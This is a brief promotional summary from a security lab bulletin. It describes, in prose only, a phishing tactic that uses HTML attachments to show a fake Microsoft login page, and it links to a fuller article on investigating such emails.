An email that contains a link or an attachment is sent to the recipient with the purpose of retrieving data by directing the user to some fake web page on the internet, or by executing a malicious code from an attachment.
Phishing campaigns often use the same formula. An email that contains a link or an attachment is sent to the recipient with the purpose of retrieving data by directing the user to some fake web page on the internet, or by executing a malicious code from an attachment. This text presents the HTML tactic that is used for phishing. The text also presents a few methods which are used to discover and prevent scam emails. The tactic itself isn’t new, but the case studied in this text is a recent one. In this phishing tactic, an HTML attachment is sent to the target. If the target opens the attachment, it executes the malicious code and a phishing website runs locally in the target’s web browser.
Analyzing and understanding how different kinds of malicious links and malware works is interesting and useful for defensive purposes, but it is important to analyze them in a safe and isolated environment. Centria SecuLab has a malware lab environment where malicious programs and links can be tested safely. Our Cyber Security Specialist Olli Isohanni wrote an article about how to investigate a phishing mail.
The article is about a email was targeted to a specific individual as a notice of payment that was made recently. The only way to check this so called “payment” was to download the included attachment named “Remittance-copy” and to open it. This attachment opened a somewhat authentic looking Microsoft login page that had the targets email address already filled…
Read the full story about how to handle a phishing mail. centriabulletin.fi/phishing